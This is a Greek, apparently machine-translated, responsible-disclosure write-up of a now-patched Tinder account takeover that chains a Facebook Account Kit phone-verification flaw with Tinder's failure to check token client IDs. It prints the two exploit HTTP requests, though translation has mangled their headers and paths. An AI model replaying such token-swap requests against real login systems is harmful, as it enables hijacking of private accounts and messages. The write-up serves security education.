Πώς χάραξα λογαριασμούς Tinder χρησιμοποιώντας το κιτ λογαριασμού του Facebook και κέρδισα $ 6.250 σε bounties

Αυτό δημοσιεύεται με την άδεια του Facebook σύμφωνα με την υπεύθυνη πολιτική αποκάλυψης.

Οι ευπάθειες που αναφέρονται σε αυτήν την ανάρτηση ιστολογίου συνδέθηκαν γρήγορα από τις τεχνικές ομάδες του Facebook και του Tinder.

Αυτή η ανάρτηση αφορά μια ευπάθεια ανάληψης λογαριασμού που ανακάλυψα στην εφαρμογή του Tinder. Με την εκμετάλλευση αυτού, ένας εισβολέας θα μπορούσε να αποκτήσει πρόσβαση στον λογαριασμό Tinder του θύματος, ο οποίος πρέπει να έχει χρησιμοποιήσει τον αριθμό τηλεφώνου του για να συνδεθεί.

Αυτό θα μπορούσε να αξιοποιηθεί μέσω μιας ευπάθειας στο κιτ λογαριασμού του Facebook, το οποίο έχει αντιμετωπίσει πρόσφατα το Facebook.

Τόσο οι διαδικτυακές εφαρμογές όσο και οι εφαρμογές κινητής τηλεφωνίας επιτρέπουν στους χρήστες να χρησιμοποιούν τους αριθμούς κινητών τηλεφώνων τους για να συνδεθούν στην υπηρεσία. Και αυτή η υπηρεσία σύνδεσης παρέχεται από το Account Kit (Facebook).

Ο χρήστης κάνει κλικ στο Σύνδεση με αριθμό τηλεφώνου στο tinder.com και στη συνέχεια ανακατευθύνεται στο Accountkit.com για σύνδεση. Εάν ο έλεγχος ταυτότητας είναι επιτυχής, τότε το κιτ λογαριασμού μεταβιβάζει το διακριτικό πρόσβασης στο Tinder για σύνδεση.

Είναι ενδιαφέρον ότι το Tinder API δεν έλεγχε το αναγνωριστικό πελάτη στο διακριτικό που παρέχεται από το Account Kit.

Αυτό επέτρεψε στον εισβολέα να χρησιμοποιήσει οποιοδήποτε διακριτικό πρόσβασης άλλης εφαρμογής που παρέχεται από το Account Kit για να αναλάβει τους πραγματικούς λογαριασμούς Tinder άλλων χρηστών.

Περιγραφή ευπάθειας

Το Account Kit είναι ένα προϊόν του Facebook που επιτρέπει στους χρήστες να εγγραφούν γρήγορα και να συνδεθούν σε ορισμένες καταχωρημένες εφαρμογές χρησιμοποιώντας μόνο τους αριθμούς τηλεφώνου ή τις διευθύνσεις email τους χωρίς να χρειάζονται κωδικό πρόσβασης. Είναι αξιόπιστο, εύκολο στη χρήση και δίνει στον χρήστη μια επιλογή για το πώς θέλει να εγγραφεί σε εφαρμογές.

Το Tinder είναι μια εφαρμογή για κινητά βάσει τοποθεσίας για αναζήτηση και συνάντηση νέων ατόμων. Επιτρέπει στους χρήστες να αρέσουν ή να μην τους αρέσουν οι άλλοι χρήστες και, στη συνέχεια, να προχωρήσουν σε μια συνομιλία, αν και τα δύο μέρη μετακινήθηκαν δεξιά.

Υπήρχε ένα θέμα ευπάθειας στο Account Kit μέσω του οποίου ένας εισβολέας θα μπορούσε να αποκτήσει πρόσβαση σε λογαριασμό λογαριασμού οποιουδήποτε χρήστη χρησιμοποιώντας μόνο τον αριθμό τηλεφώνου του. Μόλις μπείτε, ο εισβολέας θα μπορούσε να είχε λάβει το διακριτικό πρόσβασης του κιτ λογαριασμού χρήστη που υπάρχει στα cookie του (aks).

Μετά από αυτό, ο εισβολέας θα μπορούσε να χρησιμοποιήσει το διακριτικό πρόσβασης (aks) για να συνδεθεί στο λογαριασμό Tinder του χρήστη χρησιμοποιώντας ένα ευάλωτο API.

Πώς η εκμετάλλευση μου λειτούργησε βήμα προς βήμα

Βήμα 1

Αρχικά ο εισβολέας θα συνδεθεί στο λογαριασμό του κιτ λογαριασμού του θύματος εισάγοντας τον αριθμό τηλεφώνου του θύματος στο " new_phone_number " στο αίτημα API που φαίνεται παρακάτω.

Λάβετε υπόψη ότι το κιτ λογαριασμού δεν επαληθεύει τη χαρτογράφηση των αριθμών τηλεφώνου με τον εφάπαξ κωδικό πρόσβασης. Ο εισβολέας θα μπορούσε να εισαγάγει τον αριθμό τηλεφώνου του καθενός και, στη συνέχεια, να συνδεθεί απλά στο λογαριασμό του κιτ λογαριασμού του θύματος.

Στη συνέχεια, ο εισβολέας θα μπορούσε να αντιγράψει το διακριτικό πρόσβασης "aks" του θύματος της εφαρμογής Account Kit από τα cookie.

Το API ευάλωτων κιτ λογαριασμού:

POST / update / async / phone / confirm /? Dpr = 2 HTTP / 1.1 Host: www.accountkit.com new_phone_number = [αριθμός τηλεφώνου vctim] & update_request_code = c1fb2e919bb33a076a7c6fe4a9fbfa97 [κωδικός αιτήματος του εισβολέα] & επιβεβαίωση_code = 258822 1 & __ dyn = & __ req = 6 & __ be = -1 & __ pc = PHASED% 3ADEFAULT & __ rev = 3496767 & fb_dtsg = & jazoest =

Βήμα 2

Τώρα ο εισβολέας απλώς επαναλαμβάνει το ακόλουθο αίτημα χρησιμοποιώντας το αντιγραφικό διακριτικό πρόσβασης "aks" του θύματος στο Tinder API παρακάτω.

Θα συνδεθούν στον λογαριασμό Tinder του θύματος. Ο εισβολέας θα είχε βασικά πλήρη έλεγχο του λογαριασμού του θύματος. Μπορούσαν, μεταξύ άλλων, να διαβάσουν ιδιωτικές συνομιλίες, πλήρη προσωπικά στοιχεία και να περάσουν τα προφίλ άλλων χρηστών αριστερά ή δεξιά.

API ευπαθών Tinder:

POST / v2 / auth / login / accountkit? Locale = el HTTP / 1.1

Κεντρικός υπολογιστής: api.gotinder.com

Σύνδεση: κλείσιμο

Μήκος περιεχομένου: 185

Προέλευση: //tinder.com

έκδοση εφαρμογής: 1000000

πλατφόρμα: Ιστός

Χρήστης-πράκτορας: Mozilla / 5.0 (Macintosh)

content-type: application / json

Αποδοχή: * / *

Παραπομπή: //tinder.com/

Αποδοχή-κωδικοποίηση: gzip, deflate

Αποδοχή-Γλώσσα: en-US, en; q = 0,9

{"Token": "xxx", "id": ""}

Βίντεο απόδειξη της έννοιας

Χρονοδιάγραμμα

Και οι δύο ευπάθειες επιδιορθώθηκαν γρήγορα από τον Tinder και το Facebook. Το Facebook μου επιβράβευσε 5.000 $ και ο Tinder μου έδωσε 1,250 $.

Είμαι ο ιδρυτής της AppSecure, μιας εξειδικευμένης εταιρείας ασφάλειας στον κυβερνοχώρο με χρόνια δεξιοτήτων που αποκτήθηκαν και σχολαστική εμπειρία. Είμαστε εδώ για να προστατεύσουμε την επιχείρησή σας και τα κρίσιμα δεδομένα σας από απειλές ή ευπάθειες στο διαδίκτυο και εκτός σύνδεσης.

Μπορείτε να επικοινωνήσετε μαζί μας στο [email protected] ή στο [email protected]